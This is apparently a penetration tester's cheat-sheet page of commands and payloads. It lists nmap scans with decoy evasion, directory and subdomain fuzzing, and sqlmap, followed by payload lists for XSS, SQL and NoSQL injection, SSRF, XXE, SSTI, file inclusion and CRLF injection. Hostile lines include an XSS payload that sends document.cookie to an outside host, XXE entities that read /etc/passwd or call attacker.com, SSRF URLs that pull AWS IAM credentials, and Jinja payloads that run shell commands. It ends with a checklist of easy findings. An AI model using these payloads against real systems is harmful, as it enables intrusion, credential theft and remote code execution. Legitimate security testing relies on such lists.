Handy Commands & Payloads

Commands and Payloads that I use the most to get the basics covered.

Nmap

Initial Port Scan and Service Scan with Evasive Techniques:

nmap -f -D RND:10 -p- -Pn $TARGET

nmap -sC -sV -p $(nmap -f -D RND:10 -p- -Pn $TARGET | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',') $TARGET

Other nmap scans:

sudo nmap -Pn -p 3389 -ff -send-eth -script rdp-enum-encryption $IP

Test SSL

testssl $URL

Nikto

nikto -host $URL
nikto -h $URL -O STATIC-COOKIE="Authorization: Bearer..."

Nuclei

nuclei -u $URL
nuclei -u $URL -H "cookie: "

# Use secrets.yaml file for other authentication mechanisms

Nuclei Fuzzer

nf -d $URL

Directory Fuzzing

Gobuster:

gobuster dir -u $URL -t 20 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -b 302,404 -o gobuster_dir.txt

ffuf (Basic):

ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -mc 200 -c -r -sf -t 20 -o ffuf_dir.csv -of csv

Ffuf (API):

ffuf -request api.req -w /opt/SecLists/Discovery/Web-Content/api/common-paths,actions-lowercase,/opt/SecLists/Fuzzing/special-chars.txt -request-proto http -mc 200 -c -r -sf -o fuff_api_dir.csv -of csv

VHOST Fuzzing

ffuf -H "Host: FUZZ.collect.htb" -u http://collect.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -c -r -sf -ac -o subd_ffuf.txt

SQLi

sqlmap -r app.req --level 5 --risk 3 --batch

XSS Best Payloads

<script>alert(1)</script>
<script src=//14.rs></script>
"><svg onload=alert()>
<embed src=//14.rs>
<!--><script src=//14.rs>
url=%26%2302java%26%23115cript:alert(document.domain)
<video><source onerror=location=/\02.rs/+document.cookie>
<script>alert(document.domain)</script>
<a href=javascript:confirm()>click here

SQL Injection Payloads

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /* 
' OR '1'='1' //
' OR '1'='1' #
admin' --
admin' /*
admin' //
admin' #
' OR 1=1
' OR 1=1 --
' OR 1=1 /*
' OR 1=1 //
' OR 1=1 #
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' OR 'a'='a' //
' OR 'a'='a' #

NoSQL Injection Payloads

{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": "admin", "password": {"$ne": null}}
{"username": "admin", "password": {"$gt": ""}}
{"username": "admin", "password": {"$in": [""]}}
{"username": "admin", "password": {"$where": "this.password.length > 0"}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$ne": null}}
{"username": {"$eq": "admin"}, "password": {"$ne": "admin"}}
{"username": {"$ne": "admin"}, "password": {"$exists": true}}
{"username": {"$in": ["admin", "user"]}, "password": {"$ne": "password"}}

SSRF Payloads

# Retrieve AWS Metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/macs/

http://127.0.0.1:80
http://127.0.0.1:8080
http://localhost:80
http://localhost:8080
http://0.0.0.0:80
http://0.0.0.0:8080
http://[::]:80
http://[::]:8080
http://[::1]:80
http://[::1]:8080
http://internal-service:80
http://internal-service:8080

XXE Payloads

xmlCopy code<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://attacker.com/evil.dtd" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "ftp://attacker.com/evil.txt" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "jar:http://attacker.com/evil.jar!/" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "gopher://attacker.com/evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "data:text/plain,evil" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "expect://id" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php" > ]><foo>&xxe;</foo>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "php://input" > ]><foo>&xxe;</foo>

SSTI Payloads

# jinja
{{7*7}}
{{7*'7'}}
{{7*'7'.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{config.items()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{request['application']['__globals__']['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in [].__class__.__base__.__subclasses__() %}
{{c}}
{% endfor %}
{{''.__class__.mro()[1].__subclasses__()[40].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{config['SECRET_KEY'].__class__.__mro__[2].__subclasses__()[40]('id').read()}}
{{request.application.__globals__.__builtins__.open('index.html').read()}}

File Inclusion Payloads

../../../../../../etc/passwd
../../../../../../boot.ini
../../../../../../windows/win.ini
../../../../../../winnt/win.ini
../../../../../../windows/system.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../winnt/system32/drivers/etc/hosts
../../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../usr/local/apache/logs/access.log
../../../../../../usr/local/apache/logs/error.log
../../../../../../var/www/html/index.php
../../../../../../var/www/html/wp-config.php
../../../../../../usr/local/etc/php.ini
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/mysql/my.cnf

CRLF Injection Payloads

GET / HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /index.html HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /submit HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET / HTTP/1.1\r\nHost: example.com\r\nSet-Cookie: injected-cookie=value\r\n

POST /login HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

GET /search?q=test HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /upload HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /download HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

POST /create HTTP/1.1\r\nHost: example.com\r\nX-Custom-Header: custom-value\r\n

GET /api/v1/data HTTP/1.1\r\nHost: example.com\r\nX-Injected-Header: injected-value\r\n

Easy Vulnerabilities & Security Misconfigurations to Report

Vulnerabilities that could be found in the early stages (first few hours) of a pentest.

Security Headers

Misconfigured Security Headers:
- X-Frame-Options
- X-XSS-Protection
- X-Content-Type-Options
- Strict-Transport-Security
- Content-Security-Policy (CSP)
- Referrer-Policy

Insecure CORS Configuration:
- Allowing wildcard (*) origin
- Allowing untrusted origins
- Lack of proper validation

Insecure Cookie Attributes:
- Missing HttpOnly flag
- Missing Secure flag
- Missing SameSite attribute

Authentication & Session Management

Concurrent Logins Allowed:
- Multiple sessions from different IPs
Improper Session Timeout:
- Long or no session expiration
Improper Invalidation of Cookie Post Logout:
- Session remains active after logout
Weak Password Policies:
- No complexity requirements
- Lack of rate limiting

File Handling

Unrestricted File Upload:
- No file type validation
- No file size restrictions
- No scanning for malware

Access Controls

Staging Environment Accessible from External Network:
- Exposed internal environments
Sensitive Directories Accessible:
- /.git/, /.svn/, /backup/, /config/

Web Server Configuration

Clickjacking:
- Missing X-Frame-Options header
Weak SSL Ciphers:
- Use of deprecated SSL/TLS versions
- Weak cipher suites enabled
Web Server Fingerprinting:
- Banner Grabbing revealing server information

Information Disclosure

Verbose Error Messages:
- Detailed stack traces
- Application/Server details in error messages
Directory Listing Enabled:
- Ability to list files in web directories

Business Logic & Other Issues

Lack of Rate Limiting:
- Brute force or DoS vulnerabilities
No Account Lockout:
- Unlimited login attempts
Weak Default Credentials:
- Use of default passwords for admin accounts
HTTP Methods:
- TRACE/TRACK methods enabled
Referrer Policy:
- No Referrer Policy header
API Security:
- Lack of authentication
- Lack of rate limiting
- Exposed sensitive endpoints
Insecure Direct Object References (IDOR):
- Direct access to unauthorized resources
Lack of Input Validation:
- No sanitization of user input

Additional Points

Backup Files Accessible:
- .bak, .old, .save files accessible
Exposed API Keys or Tokens:
- API keys or tokens in URLs, JavaScript, etc.
Insufficient Logging and Monitoring:
- Lack of logging for security events
Cross-Site Request Forgery (CSRF):
- Missing or incorrect CSRF tokens
Insufficient Transport Layer Security:
- HTTP instead of HTTPS
Autocomplete Enabled for Sensitive Fields:
- Sensitive form fields have autocomplete enabled
Insecure Directories:
- /admin/, /config/, /backup/ directories exposed
Insecure Third-Party Integrations:
- Unpatched or outdated third-party libraries and frameworks

PreviousCORS Misconfiguration NextActive Directory Pentest

Last updated 1 year ago